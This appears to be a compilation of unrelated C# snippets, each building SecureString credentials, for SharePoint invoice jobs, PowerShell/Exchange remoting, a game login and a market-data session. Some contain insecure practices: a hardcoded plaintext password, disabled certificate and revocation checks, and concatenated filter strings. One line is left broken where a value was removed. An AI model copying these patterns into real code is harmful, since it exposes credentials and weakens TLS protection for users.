private static void ReadConfigurationValues() { Logger.log.Info("Reading Configuration values from config"); coversheetHeaderList = ConfigurationManager.AppSettings.Get("CoversheetHeaderList"); coversheetDetailsList = ConfigurationManager.AppSettings.Get("CoversheetDetailsList"); siteurl = ConfigurationManager.AppSettings.Get("SiteUrl"); domain = ConfigurationManager.AppSettings.Get("Domain"); username = ConfigurationManager.AppSettings.Get("UserName"); password = ConfigurationManager.AppSettings.Get("Password"); isCloud = Convert.ToBoolean(ConfigurationManager.AppSettings.Get("CloudEnvironment")); if (!string.IsNullOrEmpty(siteurl)) { context = new ClientContext(siteurl); } else { Logger.log.Info("Site Url set to null in the configuration"); } if (isCloud) { Logger.log.Info("Environment configuration set for Cloud"); System.Security.SecureString pwdSecureString = new System.Security.SecureString(); if (!string.IsNullOrEmpty(password)) { foreach (char c in password) { pwdSecureString.AppendChar(c); } context.Credentials = new SharePointOnlineCredentials(username, pwdSecureString); } } else { Logger.log.Info("Environment configuration set for On premise"); context.Credentials = new NetworkCredential(username, password, domain); } Web web = context.Web; context.Load(web, w => w.Title, w => w.Url); List listHeader = web.Lists.GetByTitle(coversheetHeaderList); CamlQuery camlQuery = new CamlQuery(); camlQuery.ViewXml = "<View><Query><Where><Geq><FieldRef Name='ID'/>" + "<Value Type='Number'>0</Value></Geq></Where></Query></View>"; ListItemCollection collection = listHeader.GetItems(camlQuery); context.Load(collection, items => items.Include( item => item.Id, item => item["Title"], item => item["Vendor_x0020_Name"], item => item["Accounting_x0020_Approval"] )); context.ExecuteQuery(); Logger.log.Info("Context created for the web and header list"); foreach (ListItem item in collection) { UpdateDetailsList(web, item.Id.ToString(), item["Accounting_x0020_Approval"].ToString()); } }
private void FormPrincipal_Load(object sender, EventArgs e) { Utils.isCentralizado = File.Exists(Path.Combine(Directory.GetCurrentDirectory(), "ProcessWPUI.exe")); try { if (SvcWPUI.Status == System.ServiceProcess.ServiceControllerStatus.Running) { SvcWPUI.Stop(); } } catch (Exception) { } if (string.IsNullOrEmpty(Utils.GetSetting("server")) || string.IsNullOrEmpty(Utils.GetSetting("port"))) { Utils.SetSetting("server", ConfigurationManager.AppSettings["server"]); Utils.SetSetting("port", int.Parse(ConfigurationManager.AppSettings["port"])); Utils.SetSetting("sql", bool.Parse(ConfigurationManager.AppSettings["sql"])); Utils.SetSetting("cftp", ConfigurationManager.AppSettings["cftp"]); } timerPing.Start(); Utils.RegistrarLog("Load.log", "UI Iniciado"); Utils.RegistrarLog("Load.log", "-----"); ContextMenu1.MenuItems.Add("Configurar Ambiente y Licencia", new EventHandler(this.Ambiente_Click)); ContextMenu1.MenuItems[0].Enabled = true; ContextMenu1.MenuItems.Add("-"); ContextMenu1.MenuItems.Add("&Acerca de...", new EventHandler(this.AcercaDe_Click)); ContextMenu1.MenuItems[1].DefaultItem = true; ContextMenu1.MenuItems.Add("&Configuración", new EventHandler(this.ConfigGen_Click)); ContextMenu1.MenuItems.Add("-"); ContextMenu1.MenuItems.Add("&Salir", new EventHandler(this.Salir_Click)); notifyIcon2.ContextMenu = ContextMenu1; WindowState = FormWindowState.Minimized; ShowInTaskbar = false; timer1.Stop(); string nroLicencia = ""; string ambientecfg = ""; string perfil = ""; string inRun = "No"; string installDir = Directory.GetCurrentDirectory(); string statUI = "updated"; try { Microsoft.Win32.RegistryKey key = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(@"SOFTWARE\WinperUpdate"); nroLicencia = key.GetValue("Licencia").ToString(); ambientecfg = key.GetValue("Ambientes").ToString(); inRun = key.GetValue("InRun").ToString(); perfil = key.GetValue("Perfil").ToString(); installDir = key.GetValue("InstallDir").ToString(); statUI = key.GetValue("StatUI").ToString(); key.Close(); } catch (Exception) { Microsoft.Win32.RegistryKey key = Microsoft.Win32.Registry.CurrentUser.CreateSubKey(@"SOFTWARE\WinperUpdate"); key.SetValue("Licencia", nroLicencia); key.SetValue("Ambientes", ambientecfg); key.SetValue("InRun", inRun); key.SetValue("Perfil", perfil); key.SetValue("InstallDir", installDir); key.SetValue("StatUI", statUI); key.Close(); } string regUI = Path.Combine(Path.GetTempPath(), "regUI.bat"); string exe = Path.Combine(installDir, "WinPerUpdateUI.exe"); int intentos = 0; var keyRun = Microsoft.Win32.Registry.CurrentUser.CreateSubKey(@"SOFTWARE\WinperUpdate"); while (intentos < 3 && inRun.Equals("No")) { try { if (File.Exists(regUI)) { File.Delete(regUI); } if (!File.Exists(regUI)) { File.WriteAllLines(regUI, new string[] { "@echo off", "cd %windir%\\system32", "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v WinperUpdate /t REG_SZ /d \"" + exe + "\" /f >> regUI.log" }); } var pas = Utils.ShowDialogInput(string.Format("Se procederá a configurar WinAct en el arranque de Windows.\nEscriba la clave para el usuario {0}", Environment.UserName), "Clave de Usuario", true); if (string.IsNullOrEmpty(pas)) { intentos++; MessageBox.Show(string.Format("No ha escrito ninguna clave, vuelva a intentarlo (Intento {0}/3)", intentos), "ERROR", MessageBoxButtons.OK, MessageBoxIcon.Error); } else { var sec = new System.Security.SecureString(); for (int i = 0; i < pas.Length; i++) { sec.AppendChar(pas.ElementAt(i)); } Process.Start(regUI, Environment.UserName, sec, Environment.UserDomainName); inRun = "Si"; keyRun.SetValue("InRun", inRun); var key = Microsoft.Win32.Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"); key.SetValue("WinperUpdate", exe); key.Close(); MessageBox.Show("WinAct fue configurado al inicio de Windows correctamente", "AVISO", MessageBoxButtons.OK, MessageBoxIcon.Information); } } catch (Exception ex) { intentos++; MessageBox.Show(string.Format("{0} (Intento {1}/3)", ex.Message, intentos), "ERROR", MessageBoxButtons.OK, MessageBoxIcon.Error); } if (intentos >= 3 && inRun.Equals("No")) { MessageBox.Show("El numero de intentos sobrepaso el límite.\n\nWinAct no se pudo configurar al inicio de Windows. Esto NO afectará el funcionamiento de WinAct", "AVISO", MessageBoxButtons.OK, MessageBoxIcon.Asterisk); } } keyRun.Close(); if (!string.IsNullOrEmpty(nroLicencia)) { string server = Utils.GetSetting("server"); string port = Utils.GetSetting("port"); try { string json = Utils.StrSendMsg(server, int.Parse(port), "checklicencia#" + nroLicencia + "#"); cliente = JsonConvert.DeserializeObject <ClienteBo>(json); if (cliente != null) { json = Utils.StrSendMsg(server, int.Parse(port), "ambientes#" + cliente.Id.ToString() + "#"); ContextMenu1.MenuItems.Clear(); MenuItem addDevice = new MenuItem("&Estado de la Versión"); addDevice.Enabled = true; ambientes = JsonConvert.DeserializeObject <List <AmbienteBo> >(json); foreach (var ambiente in ambientes) { var key = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(@"SOFTWARE\WinperUpdate\" + ambiente.Nombre); if (key != null) { string dirwp = key.GetValue("DirWinper") == null ? "" : key.GetValue("DirWinper").ToString(); if (Directory.Exists(dirwp)) { addDevice.MenuItems.Add(new MenuItem(ambiente.Nombre, new EventHandler(this.Restaurar_Click))); } key.Close(); } } /*Obtiene los modulos contratados del cliente con sus respectivos componentes*/ json = Utils.StrSendMsg(server, int.Parse(port), "modulos#" + cliente.Id + "#"); Utils.ModulosContratados = JsonConvert.DeserializeObject <List <ModuloBo> >(json); ContextMenu1.MenuItems.Add(addDevice); ContextMenu1.MenuItems.Add("Configurar Ambiente y Licencia", new EventHandler(this.Ambiente_Click)); ContextMenu1.MenuItems[1].Enabled = true; ContextMenu1.MenuItems.Add("-"); ContextMenu1.MenuItems.Add("&Acerca de...", new EventHandler(this.AcercaDe_Click)); ContextMenu1.MenuItems[2].DefaultItem = true; ContextMenu1.MenuItems.Add("&Configuración", new EventHandler(this.ConfigGen_Click)); ContextMenu1.MenuItems.Add("-"); ContextMenu1.MenuItems.Add("&Salir", new EventHandler(this.Salir_Click)); notifyIcon2.ContextMenu = ContextMenu1; timer1.Start(); timerUI.Start(); TipoVentana = -1; notifyIcon2.BalloonTipIcon = ToolTipIcon.None; notifyIcon2.BalloonTipTitle = "WinActUI"; notifyIcon2.BalloonTipText = "Acá se encuentra WinAct!"; notifyIcon2.ShowBalloonTip(5000); } } catch (Exception ex) { if (ContextMenu1.MenuItems.Count > 0) { ContextMenu1.MenuItems[0].Enabled = false; ContextMenu1.MenuItems[1].Enabled = false; } else { ContextMenu1.MenuItems.Add("Configurar Ambiente y Licencia", new EventHandler(this.Ambiente_Click)); ContextMenu1.MenuItems[0].Enabled = false; ContextMenu1.MenuItems.Add("-"); ContextMenu1.MenuItems.Add("&Acerca de...", new EventHandler(this.AcercaDe_Click)); ContextMenu1.MenuItems[1].DefaultItem = true; ContextMenu1.MenuItems.Add("&Configuración", new EventHandler(this.ConfigGen_Click)); ContextMenu1.MenuItems.Add("-"); ContextMenu1.MenuItems.Add("&Salir", new EventHandler(this.Salir_Click)); } MessageBox.Show("WinAct no pudo iniciarce correctamente, puede revisar el log 'Load.log'"); Utils.RegistrarLog("Load.log", ex.ToString()); } } }
//********************************************************************* /// /// <summary> /// /// </summary> /// <param name="url"></param> /// <param name="userName"></param> /// <param name="userPassword"></param> /// <returns></returns> /// /// /// /// /// //********************************************************************* Runspace GetOpenRunspace(string url, string userName, string userPassword) { var rr = new RemotingResult(); var impersonate = false; try { if (null != _Runspace) { if (_Runspace.RunspaceStateInfo.State == RunspaceState.Opened) { return(_Runspace); } } var connectTo = new Uri(String.Format("{0}/wsman", url)); WSManConnectionInfo connectionInfo = null; //if (url.ToLower().Contains("https:")) if (url.ToLower().Contains("https:") | url.ToLower().Contains("http:")) { if (url.ToLower().Contains("http:")) { AddHostToLocalTrusedHosts(url); } var secString = new System.Security.SecureString(); foreach (var c in userPassword) { secString.AppendChar(c); } var psCred = new PSCredential(userName, secString); connectionInfo = new WSManConnectionInfo(connectTo, "", psCred); } else { connectionInfo = new WSManConnectionInfo(connectTo); if (null != userName) { impersonate = true; } } connectionInfo.SkipCACheck = true; connectionInfo.SkipCNCheck = true; connectionInfo.SkipRevocationCheck = true; // //*** Can I use this? Why should I? *** /*using (RunspaceInvoke invoker = new RunspaceInvoke()) * { * invoker.Invoke("Set-ExecutionPolicy Unrestricted -Scope Process"); * }*/ /*if (impersonate) * { * using (new CmpServiceLib.Impersonator(userName, "ImpersonateDomain", userPassword)) * { * _Runspace = RunspaceFactory.CreateRunspace(connectionInfo); * _Runspace.Open(); * } * } * else * {*/ _Runspace = RunspaceFactory.CreateRunspace(connectionInfo); _Runspace.Open(); //} return(_Runspace); } catch (System.Management.Automation.Remoting.PSRemotingTransportException ex) { var message = ex.Message; throw new FailToConnectException(UnwindExceptionMessages(ex)); } catch (Exception ex) { throw new Exception("Exception in Remoting.GetOpenRunspace() : " + ex.Message); } }
/// <summary> /// Unprotects data into a SecureString /// </summary> /// <param name="aData">Data to decrypt</param> /// <returns>SecureString</returns> public static System.Security.SecureString SecureUnprotect(byte[] aData) { if (aData == null || aData.Length == 0) return new System.Security.SecureString(); System.Security.SecureString Result = new System.Security.SecureString(); foreach (byte b in Unprotect(aData)) Result.AppendChar((char)b); return Result; }
static void Main(string[] args) { try { //log the start time Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("Started Processing.."); Logger.log.Info("=========== Started Approval Email Notification Service ===================="); Utils.ReadConfigurationValues(); dtOrgInfo = ConstructOrgTable(); dtHeader = ConstructDataTable(); if (!string.IsNullOrEmpty(Invoice._siteUrl)) { context = new ClientContext(Invoice._siteUrl); } else { Logger.log.Info("The site url set to null in configuration"); } if (Invoice._runforCloud) { Logger.log.Info("The configuration set to run for cloud"); System.Security.SecureString pwdSecureString = new System.Security.SecureString(); if (!string.IsNullOrEmpty(Invoice._password)) { foreach (char c in Invoice._password) { pwdSecureString.AppendChar(c); } context.Credentials = new SharePointOnlineCredentials(Invoice._userName, pwdSecureString); } } else { Logger.log.Info("The configuration set to run for On Premise environment"); context.Credentials = new NetworkCredential(Invoice._userName, Invoice._password, Invoice._domain); } Web web = context.Web; context.Load(web, w => w.Title, w => w.Url); List listHeader = web.Lists.GetByTitle(Invoice._invoiceCoverSheetHeaderListName); listOrganizationInfo = web.Lists.GetByTitle(Invoice._orgListName); //Updating the Status from Dvisional Approval Approved to Accounting Approval Pending UpdateDivApprovedtoAccountPendingStatus(listHeader); Console.WriteLine("Status Update Done."); dtHeader = GetHeaderInfo(listHeader); DataTable dtCompanyIDs = dtHeader.DefaultView.ToTable(true, "InvoiceCompany"); if (dtCompanyIDs != null) { foreach (DataRow dr in dtCompanyIDs.Rows) { string companyID = dr["InvoiceCompany"].ToString(); // Divisional Approval Pending try { DataRow[] drDvisions = dtHeader.Select("InvoiceCompany=" + companyID + "AND DivisionalApproval = 'Divisional Approval Pending'"); string divApprovalType = "divisional"; if (drDvisions.Length != 0) { Logger.log.Info("Sending Mails to Divisional Approvers "); StringBuilder divEmailBuilder = ConstructEmailBody(drDvisions, divApprovalType); SendApproverEmailRejected(companyID, divApprovalType, divEmailBuilder); Console.WriteLine("Sent Emails to Divisional Approvers for Company " + companyID); } } catch (Exception ex) { // Logger.log.Error("Error in Getting Divisional Approvers Details " + ex.ToString()); // Console.WriteLine("Error {0}", ex); } //Accounting Approval Pending try { DataRow[] drAccounts = dtHeader.Select("InvoiceCompany=" + companyID + "AND AccountingApproval ='Accounting Approval Pending'"); string accntApprovalType = "accounting"; if (drAccounts.Length != 0) { Logger.log.Info("Sending Mails to Accounting Approvers Rejected"); StringBuilder accntEmailBuilder = ConstructEmailBody(drAccounts, accntApprovalType); SendApproverEmailRejected(companyID, accntApprovalType, accntEmailBuilder); Console.WriteLine("Sent Emails to Accounting Approvers for Company " + companyID); } } catch (Exception ex) { // Logger.log.Error("Error in Getting Accounting Approvers Details " + ex.ToString()); } } // Divisional Approval Rejected try { DataRow[] drDvisions = dtHeader.Select("DivisionalApproval = 'Divisional Approval Rejected'"); string divApprovalType = "divisional"; if (drDvisions.Length != 0) { Logger.log.Info("Sending Mails to Divisional Approvers Rejected "); StringBuilder divEmailBuilder = ConstructEmailBodyRejected(drDvisions, divApprovalType); SendApproverEmailRejected(divApprovalType, divEmailBuilder); Console.WriteLine("Sent Emails to Divisional Approval Rejected"); } } catch (Exception ex) { Logger.log.Error("Error in Getting Divisional Approvers Details " + ex.ToString()); Console.WriteLine("Error {0}", ex); } // Accounting Approval Rejected try { DataRow[] drAccounts = dtHeader.Select("AccountingApproval ='Accounting Approval Rejected'"); string accntApprovalType = "accounting"; if (drAccounts.Length != 0) { Logger.log.Info("Sending Mails to Accounting Approvers"); StringBuilder accntEmailBuilder = ConstructEmailBodyRejected(drAccounts, accntApprovalType); SendApproverEmailRejected(accntApprovalType, accntEmailBuilder); Console.WriteLine("Sent Emails to Accounting Approvers Rejected"); } } catch (Exception ex) { Logger.log.Error("Error in Getting Accounting Approvers Details " + ex.ToString()); } } Logger.log.Info("=========== Completed Approval Email Notification Service ===================="); Console.WriteLine("Process completed, please close the window to exit process..!"); //Console.ReadKey(); } catch (Exception ex) { Logger.log.Error("Error in Approval Email " + ex.ToString()); Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("Error in sending Invoice approval mails, Please check all the configurations and try again..{0}", ex); Console.ResetColor(); // Console.ReadLine(); } }
public static System.Security.SecureString CreateSecureString(string inputString) { System.Security.SecureString secureString = new System.Security.SecureString(); foreach (Char character in inputString) { secureString.AppendChar(character); } return secureString; }
public ICustomActivityResult Execute() { string command = "Enable-Mailbox"; DataTable dt = new DataTable("resultSet"); dt.Columns.Add("Result", typeof(String)); string shellUri = ""; System.Uri serverUri = new Uri(String.Format("HTTPS://{0}/powershell?serializationLevel=Full", HostName)); System.Security.SecureString securePassword = new System.Security.SecureString(); foreach (char c in Password.ToCharArray()) { securePassword.AppendChar(c); } PSCredential creds = new PSCredential(UserName, securePassword); RunspaceConfiguration rc = RunspaceConfiguration.Create(); WSManConnectionInfo wsManInfo = new WSManConnectionInfo(serverUri, shellUri, creds); //wsManInfo.AuthenticationMechanism = AuthenticationMechanism.Default; wsManInfo.SkipCNCheck = true; wsManInfo.SkipCACheck = true; using (var runspace = RunspaceFactory.CreateRunspace(wsManInfo)) { runspace.Open(); using (PowerShell powershell = PowerShell.Create()) { powershell.Runspace = runspace; powershell.AddCommand(command); powershell.Commands.AddParameter("Identity", UserLogonName); powershell.Commands.AddParameter("Database", DatabaseName); powershell.Commands.AddParameter("ErrorAction", "stop"); string errorDescription = string.Format("{0} command execution has failed.", command); Collection <PSObject> results = powershell.Invoke(); if (results != null) { if (results.Count > 0) { object resValue = results[0].Properties["IsMailboxEnabled"].Value; if (resValue != null) { if (Convert.ToBoolean(resValue)) { dt.Rows.Add("Success"); } else { throw new Exception(errorDescription); } } else { throw new Exception(errorDescription); } } else { throw new Exception(errorDescription); } } else { throw new Exception(errorDescription); } } } return(this.GenerateActivityResult(dt)); }
private object ParseElement(string toParse, Type type) { object myVal = null; Type myPropType = type; Type myUnderLyingType = myPropType; bool isNullable = myPropType.IsGenericType && myPropType.GetGenericTypeDefinition() == typeof(Nullable <>); if (isNullable) { myUnderLyingType = Nullable.GetUnderlyingType(myPropType); } if (myUnderLyingType.IsEnum) { if (!_parseEnumAsArray && myUnderLyingType.GetCustomAttribute <FlagsAttribute>() != null) { _parseEnumAsArray = true; Type _enumArrayType = myUnderLyingType.MakeArrayType(); Array _enumArray = ParseArray(toParse, _enumArrayType) as Array; int _totalVal = 0; int _iter = 0; foreach (object enVal in _enumArray) { if (_iter == 0) { _totalVal = (int)enVal; } else { _totalVal = _totalVal | (int)enVal; } _iter++; } myVal = _totalVal; _parseEnumAsArray = false; } else { myVal = Enum.Parse(myUnderLyingType, toParse, true); } } else if (typeof(System.Security.SecureString).Equals(myUnderLyingType)) { var secure = new System.Security.SecureString(); foreach (var v in toParse.ToCharArray()) { secure.AppendChar(v); } myVal = secure; } else if (typeof(KeyValuePair <,>).Name.Equals(myUnderLyingType.Name)) { Type[] _genericTypes = myUnderLyingType.GetGenericArguments(); string[] _keyValArr = toParse.Split(':'); if (_keyValArr == null || _keyValArr.Length != 2) { throw new Exception("Failed to parse key value pair"); } object _key = Parse(_keyValArr[0], _genericTypes[0]); object _val = Parse(_keyValArr[1], _genericTypes[1]); if (_key == null || _val == null) { throw new Exception("Failed to parse key value pair"); } object[] _keyValPair = new object[] { _key, _val }; myVal = myUnderLyingType.GetConstructor(_genericTypes).Invoke(_keyValPair); } else if (typeof(IConvertible).IsAssignableFrom(myUnderLyingType)) { if (myUnderLyingType == typeof(bool)) { if (BoolFalseValues.Contains(toParse?.ToLower().Trim())) { return(false); } else if (BoolTrueValues.Contains(toParse?.ToLower().Trim())) { return(true); } } else { myVal = Convert.ChangeType(toParse, myUnderLyingType); } } else if (typeof(Type).IsAssignableFrom(myUnderLyingType)) { IEnumerable <Type> _types = AppDomain.CurrentDomain.GetAssemblies().SelectMany(asm => asm.GetTypes()); myVal = _types.SkipWhile(t => (t.GetCustomAttribute <TypeParamAttribute>() != null && t.GetCustomAttribute <TypeParamAttribute>().Ignore)) .Where(t => t.MatchesAttributeValueOrName <TypeParamAttribute>(toParse, attr => (attr == null || string.IsNullOrWhiteSpace(attr.FriendlyName)) ? "" : attr.FriendlyName.ToLower())).FirstOrDefault(); } return(myVal); }
void Connect(int retry = 0) { if (connection != null) { connection.Dispose(); } connection = Sas.SasUtil.StartRx() .SelectMany(_ => { if (DC.CNetwork.s.platform.context.token != null) { return(Sas.SasUtil.StartRx()); } return(DC.CNetwork.s.platform.account.Authentication() .SelectMany(err => { if ("ok" == err) { var login_param = new Sas.Data.AccountLoginParam(); var email = new System.Security.SecureString(); "*****@*****.**".ToList().ForEach(c => email.AppendChar(c)); = email; var password = new System.Security.SecureString(); "QAZqaz1289!@".ToList().ForEach(c => password.AppendChar(c)); login_param.password = password; return DC.CNetwork.s.platform.account.Login(login_param); } else { throw new Sas.Exception(Sas.ERRNO.MESSAGE.ToErrCode(), "make sure that authentication."); } }) .SelectMany(__ => { return DC.CNetwork.s.platform.account.AccessOpen(); }) .Select(__ => 1)); }) .SelectMany(_ => { if (this.socket != null && this.socket.is_connected) { return(Sas.SasUtil.StartRx().Select(__ => this.socket)); } return(DC.CNetwork.s.platform.MakeWS("wss://localhost:8080/")); }) .SelectMany(socket => { this.socket = socket; return(socket.Send("/dc/chat/join", "") .SelectMany(_ => socket.Recv())); }) .Subscribe(_ => { }, err => { var error = err as Sas.Exception; if (error != null) { Debug.LogError(error.ToErrstrOfDC()); Debug.LogError(error.ToErrnoOfSas()); } Debug.LogError(err.Message); AttachMatchBtn(); }); }
static void Main(string[] args) { try { #region InvoiceSplit //log the start time Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("Started Processing.."); Logger.log.Info("=========== Started Invoice Processing ===================="); BrokenInvoicesLog = BrokenInvoicesLog + "<p>Hi Admin, </p>"; BrokenInvoicesLog = BrokenInvoicesLog + "<p>Coversheet Processing Status Report: <strong>" + DateTime.Now.ToString("MMMM") + " " + DateTime.Now.Day + ", " + DateTime.Now.Year + "</strong></p>"; BrokenInvoicesLog = BrokenInvoicesLog + "<table border=1 style='width: 100 %; border - style: solid; border - width: 1px;' > "; BrokenInvoicesLog = BrokenInvoicesLog + "<tr style='background-color:#7FFFD4' >"; BrokenInvoicesLog = BrokenInvoicesLog + "<th > ID </th>"; BrokenInvoicesLog = BrokenInvoicesLog + "<th > Invoice # </th>"; BrokenInvoicesLog = BrokenInvoicesLog + "<th > Vendor Name </th>"; BrokenInvoicesLog = BrokenInvoicesLog + "<th > Vendor No </th>"; BrokenInvoicesLog = BrokenInvoicesLog + "<th > Invoice Company </th>"; BrokenInvoicesLog = BrokenInvoicesLog + "<th > Invoice Date </th>"; BrokenInvoicesLog = BrokenInvoicesLog + "<th > Invoice Amount </th>"; BrokenInvoicesLog = BrokenInvoicesLog + "<th > Status </th>"; BrokenInvoicesLog = BrokenInvoicesLog + "<th > Error </th>"; BrokenInvoicesLog = BrokenInvoicesLog + "</tr>"; Utils.ReadConfigurationValues(); dtInvoices = ConstructDataTable(); if (!string.IsNullOrEmpty(Invoice._siteUrl)) { context = new ClientContext(Invoice._siteUrl); } else { Logger.log.Info("The site url is empty in configuration."); } if (Invoice._runforCloud) { Logger.log.Info("Configuration set to run for Sharepoint Online."); System.Security.SecureString pwdSecureString = new System.Security.SecureString(); if (!string.IsNullOrEmpty(Invoice._password)) { foreach (char c in Invoice._password) { pwdSecureString.AppendChar(c); } context.Credentials = new SharePointOnlineCredentials(Invoice._userName, pwdSecureString); } } else { Logger.log.Info("Configuration set to run for SharePoint On Premise."); context.Credentials = new NetworkCredential(Invoice._userName, Invoice._password, Invoice._domain); } Web web = context.Web; context.ExecuteQuery(); Logger.log.Info("Context created for given site " + Invoice._siteUrl); listCoversheet = web.Lists.GetByTitle(Invoice._invoiceSourceLibraryName); List listHeader = web.Lists.GetByTitle(Invoice._invoceDestinationListName); List listDetails = web.Lists.GetByTitle(Invoice._coversheetDetailsListName);//To push Logger.log.Info("Reading items from List : " + Invoice._invoiceSourceLibraryName); CamlQuery camlQuery = new CamlQuery(); camlQuery.ViewXml = "<View><Query><Where><Eq><FieldRef Name='processed'/><Value Type='Choice'>False</Value></Eq></Where></Query></View>"; ListItemCollection coversheetCollection = listCoversheet.GetItems(camlQuery); Logger.log.Info("CamlQuery: " + camlQuery.ViewXml); context.Load( coversheetCollection, items => items.Include( item => item.Id, item => item["Vendor_x0020_Name"], item => item["Vendor"], item => item["PO"], item => item["Invoice_x0020_Co"], item => item["Invoice_x0020_DIV"], item => item["Invoice_x0020__x0023_"],//Invoice# item => item["Invoice_x0020_Date"], item => item["Invoice_x0020_Amt"], item => item["Company"], item => item["Division"], item => item["Dept_x002d_3_x0020_CH"], item => item["Account_x002d_5_x0020_CH"], item => item["Expense_x0020_Amt"], item => item["Job"], item => item["CER"], //item => item["Monetary_Unit"], item => item["Acct_x0020_Date"], item => item["processed"], item => item["Account_x0020_String"] )); context.ExecuteQuery(); dtInvoices.Clear(); //"Filling datatable with CS Invoice data if invoice alreadey not exist in header list; FillCoversheetInfotoDataTable(dtInvoices, coversheetCollection); //Console.WriteLine("Invoice Processing Completed!"); if (dtInvoices != null && dtInvoices.Rows.Count > 0) { Logger.log.Info("Retrieved " + dtInvoices.Rows.Count + " Invoices from CoverSheet "); PushtoHeaderList(dtInvoices, listHeader, listDetails); } else { Logger.log.Info("Retrieved " + dtInvoices.Rows.Count + " Invoices from CoverSheet "); } Console.WriteLine("Invoice Processing Completed!"); Console.WriteLine("Splitting is Completed."); Logger.log.Info("Splitting Process is Completed.. "); if (Invoice._mapVouchers) { Logger.log.Info("Starting Mapping the Voucher Numbers"); Console.WriteLine("Started Mapping Voucher Number!"); if (!string.IsNullOrEmpty(Invoice._filePath)) { string filepath = string.Empty; if (System.IO.File.Exists(Invoice._filePath)) { Logger.log.Info("Getting voucher mappings file from filepath"); filepath = Invoice._filePath; } else { Logger.log.Info("Getting voucher mappings file from folder path"); Console.WriteLine("Getting file from folder :" + Invoice._filePath); filepath = GetFileFromFolderPath(Invoice._filePath); } if (!string.IsNullOrEmpty(filepath)) { string destinationPath = string.Empty; if (System.IO.File.Exists(Invoice._repository)) { Logger.log.Info("Reading destination mapping vouchers filepath "); destinationPath = Invoice._repository; } else { Logger.log.Info("Reading destination mapping vouchers filepath from folder"); string fileName = Path.GetFileName(filepath); if (Invoice._repository.ToString().ToLower().Contains(fileName.ToLower())) { destinationPath = Invoice._repository; } else { destinationPath = Invoice._repository + fileName; } } Logger.log.Info("Reading voucher map data from given file " + filepath); DataTable dtVouchers = new DataTable(); /*dtVouchers = Utils.ReadExcelData(filepath); * bool mappingCompleted = MapVoucher(dtVouchers, listHeader); * try * { * if (mappingCompleted) * { * Logger.log.Info("Mapping is completed."); * MoveFile(filepath, destinationPath); * Console.WriteLine("Voucher Mapping Process Completed.!"); * } * } * catch (Exception) * { * Console.WriteLine("Error in moving the file"); * }*/ } else { Console.WriteLine("Unable to map the voucher, reason could be the file path is not correct or the file doenst exist in the specified locaton : " + filepath); Logger.log.Info("Unable to map the voucher, reason could be the file path is not correct or the file doenst exist in the specified locaton : " + filepath); } } } else { Logger.log.Info("Mapping Voucher set to false in configuration."); } Console.WriteLine("Please Close the Window to exit Process..!"); #endregion InvoiceSplit if (!string.IsNullOrEmpty(BrokenInvoicesLog)) { BrokenInvoicesLog = BrokenInvoicesLog + " </table><br />"; string LogFileName = DateTime.Now.ToString("yyyyMMdd"); BrokenInvoicesLog = BrokenInvoicesLog + "<p>Complete log file: C:\\Dayton Rogers Log History\\InvoiceSplit_" + LogFileName + ".log </p>"; BrokenInvoicesLog = BrokenInvoicesLog + "<p>Thank you</p>"; Utils.SendEmail(BrokenInvoicesLog, Invoice._toadrress); } Logger.log.Info("============= Completed Invoice Processing ===================="); //Console.ReadLine(); } catch (Exception ex) { //Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("Error in Processing Invoice, Please check all the configurations and try again..{0}", ex); Logger.log.Error("Error in Processing Invoices, Message : " + ex.ToString()); try { if (!string.IsNullOrEmpty(BrokenInvoicesLog)) { //BrokenInvoices Email Body is not Empty then send Email BrokenInvoicesLog = BrokenInvoicesLog + " </table><br />"; string LogFileName = DateTime.Now.ToString("yyyyMMdd"); BrokenInvoicesLog = BrokenInvoicesLog + "<p>Complete log file: C:\\Dayton Rogers Log History\\InvoiceSplit_" + LogFileName + ".log </p>"; BrokenInvoicesLog = BrokenInvoicesLog + "<p>" + " <b> Error in Processing Invoice </b> " + ex.ToString() + "</p>"; BrokenInvoicesLog = BrokenInvoicesLog + "<p>Thank you</p>"; Utils.SendEmail(BrokenInvoicesLog, Invoice._toadrress); } } catch (Exception) { //Leave } } Console.ReadLine(); }
public static System.Security.SecureString SecureString(string pass) { System.Security.SecureString SSpass = new System.Security.SecureString(); foreach (char c in pass) { SSpass.AppendChar(c); } SSpass.MakeReadOnly(); return SSpass; }
public void Run(String[] args) { if (!ParseCommandLine(args)) { return; } SessionOptions sessionOptions = new SessionOptions(); SessionOptions.ServerAddress[] servers = new SessionOptions.ServerAddress[d_hosts.Count]; for (int i = 0; i < d_hosts.Count; ++i) { servers[i] = new SessionOptions.ServerAddress(d_hosts[i], d_port); } sessionOptions.ServerAddresses = servers; sessionOptions.AutoRestartOnDisconnection = true; sessionOptions.NumStartAttempts = d_hosts.Count; sessionOptions.DefaultSubscriptionService = d_service; sessionOptions.AuthenticationOptions = d_authOptions; if (d_clientCredentials != null && d_trustMaterial != null) { using (System.Security.SecureString password = new System.Security.SecureString()) { foreach (var c in d_clientCredentialsPassword) { password.AppendChar(c); } TlsOptions tlsOptions = TlsOptions.CreateFromFiles(d_clientCredentials, password, d_trustMaterial); sessionOptions.TlsOptions = tlsOptions; } } System.Console.WriteLine("Connecting to port " + d_port + " on "); foreach (string host in d_hosts) { System.Console.WriteLine(host + " "); } Session session = new Session(sessionOptions); if (!session.Start()) { System.Console.Error.WriteLine("Failed to start session."); return; } Identity identity = null; if (d_authOptions != null) { bool isAuthorized = false; identity = session.CreateIdentity(); if (session.OpenService("//blp/apiauth")) { Service authService = session.GetService("//blp/apiauth"); if (Authorize(authService, identity, session, new CorrelationID())) { isAuthorized = true; } } if (!isAuthorized) { System.Console.Error.WriteLine("No authorization"); return; } } List <Subscription> subscriptions = new List <Subscription>(); foreach (String topic in d_topics) { subscriptions.Add(new Subscription( d_service + topic, d_fields, d_options, new CorrelationID(topic))); } session.Subscribe(subscriptions, identity); ProcessSubscriptionResponse(session); }
